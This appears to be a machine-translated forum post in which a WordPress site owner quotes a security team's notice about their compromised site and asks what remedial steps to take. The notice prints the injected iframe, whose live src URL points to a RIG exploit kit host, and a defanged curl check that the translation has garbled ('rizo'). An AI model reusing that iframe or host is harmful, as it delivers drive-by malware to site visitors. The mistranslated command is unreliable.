He recibido un correo de un determinado Equipo de Respuesta a Incidentes de Seguridad en nombre de un Departamento de los EE. UU. y dice:
La URL a continuación se está utilizando actualmente para enviar una carga de software malintencionado a la computadora de una víctima visitante. La carga útil maliciosa actual parece estar en un servidor bajo su control y estamos trabajando en nombre del Departamento de Salud y Servicios Humanos de los EE. UU. (HHS) para eliminar el contenido infeccioso.
La URL anterior se ha comprometido, el código que contiene un iframe malicioso que apunta al kit de explotación RIG se ha agregado al sitio web. A continuación se muestra una muestra del iframe que apunta al kit de explotación RIG.
3) En un sistema Linux o Mac, abra la Terminal y ejecute el siguiente comando después de eliminar todos los caracteres del corchete: estos: [] - y cambiando todas las instancias de "hXXp" a "http":
rizo -H "Referer: hXXp: // www [.] Ourhostedweb [.] Com / index [.] Php / url-name /" -H "User-Agent: Mozilla / 5.0 (Windows NT 6.1; WOW64; Trident / 7.0; rv: 11.0) como Gecko" "hXXp: //www.victimweb [.] Com /"
Busque el término "iframe" en el código fuente devuelto. Habrá un iframe en la línea 105 cuya URL de origen es el contenido del kit de explotación. Actualmente, este contenido se obtiene de www [.] Ourhostedweb [.] Com. Esto puede cambiar en cualquier momento siempre que el sitio permanezca comprometido.
y el número de línea 105 contiene el siguiente código iframe:
<iframe src="http://gone.MDVEND.COM/?oq=m3WpvAoLeZRbFLhhUPULVAwn45aBlIX_qmnhkjUyRDK1sWA-xOKUTp1u9CWUbI&es_sm=147&q=wXjQMvXcJwDQD4bGMvrESLtNNknQA0KK2Iv2_dqyEoH9fmnihNzUSkr26B2aC&ie=Windows-1252&sourceid=yandex&aqs=yandex.114e103.406b1a7"width="258" height="266"></iframe>
Editar Contacto dado en el correo electrónico Correo electrónico: [email protected] Oficina: +1.253.590.4100 x0 | Fax: +1.888.239.6932 x0
El sitio se desarrolla utilizando Wordpress.
¿Cuáles son las acciones necesarias que puedo tomar para esto?